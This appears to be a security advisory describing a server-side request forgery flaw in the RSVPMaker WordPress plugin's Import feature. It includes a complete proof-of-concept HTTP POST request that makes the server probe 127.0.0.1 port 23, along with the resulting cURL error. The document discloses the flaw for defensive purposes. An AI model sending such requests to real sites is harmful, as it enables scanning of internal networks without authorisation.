The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes an URL input and calls curl on it, without first validating it to ensure itβs a remote one. As a result, a high privilege user could use that feature to scan the internal network via a SSRF attack.
Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import'
POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
Host: 172.28.128.50
Content-Length: 52
Accept: */*
X-Requested-With: XMLHttpRequest
X-WP-Nonce: b56e26b3f8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close
importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0
Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused